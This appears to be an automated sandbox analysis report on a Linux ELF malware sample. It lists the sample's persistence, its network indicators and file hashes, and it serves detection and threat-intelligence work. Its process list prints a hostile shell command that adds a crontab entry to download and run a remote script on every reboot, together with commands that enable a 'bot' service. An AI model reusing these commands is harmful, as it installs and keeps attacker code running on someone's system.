Analysis Overview
SHA256
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681
Threat Level: Shows suspicious behavior
The file 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Unexpected DNS network traffic destination
Renames itself
Modifies systemd
Creates/modifies Cron job
Changes its process name
Command and Scripting Interpreter: Unix Shell
Enumerates kernel/hardware configuration
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-05 02:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-05 02:39
Reported
2024-11-05 02:42
Platform
debian9-armhf-20240611-en
Max time kernel
144s
Max time network
183s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
|---|---|---|---|
| Destination IP | 194.36.144.87 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /var/spool/cron/crontabs/tmp.SlgGcx | /usr/bin/crontab | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /lib/systemd/system/bot.service | /tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf | N/A |
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf | N/A |
Command and Scripting Interpreter: Unix Shell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /sys/fs/kdbus/0-system/bus | /bin/systemctl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /bin/systemctl | N/A |
| File opened for reading | /proc/self/stat | /bin/systemctl | N/A |
| File opened for reading | /proc/1/environ | /bin/systemctl | N/A |
| File opened for reading | /proc/cmdline | /bin/systemctl | N/A |
| File opened for reading | /proc/mounts | /tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf | N/A |
Processes
/tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf
[/tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf]
/bin/sh
[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -]
/bin/sh
[/bin/sh -c /sbin/initctl start bot]
/sbin/initctl
[/sbin/initctl start bot]
/bin/sh
[/bin/sh -c /bin/systemctl enable bot]
/bin/systemctl
[/bin/systemctl enable bot]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 194.36.144.87:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:8036 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.SlgGcx
| Hash | Value |
|---|---|
| MD5 | 1d0bf56bdb32d8a884196a2a712007ec |
| SHA1 | a201a1cfcc93806302241e8adeddcc80187ff68c |
| SHA256 | ed1b0a18ecd01c30cde93753a50554218fd91f32428ee795a0c06c91259c24d3 |
| SHA512 | 66d4d60fc1d7d24b99172591580e0c89ee874937c1d04072813f272498fc685cd8d6e05dc59264afa255499311d4216a76a8fb1adb73229178037fc51c2eeeed |
/etc/init/bot.conf
| Hash | Value |
|---|---|
| MD5 | 9722585f219a220a4dc2a0c49bd3b019 |
| SHA1 | ffba476658ea681147c570c6f2b16a79e7d38e19 |
| SHA256 | bb41836a1f2e11795c52739e7434247d90c0f8d391afe759598baa06e3657a8d |
| SHA512 | 77f16a70995a2650a397661d7b9ce3a83f4a5c01dc6ebc5e02b60a41d425246d37ab49478dc38ee3fc956775d90e9c86f911e0ac5e5df6e142bcc82f8601d6e4 |
/lib/systemd/system/bot.service
| Hash | Value |
|---|---|
| MD5 | a4e30f6ce6fb6cf00e133f3c93fb5449 |
| SHA1 | 67b7de93a672ada4abfe11e339dc2e270c61b69d |
| SHA256 | a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede |
| SHA512 | 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25 |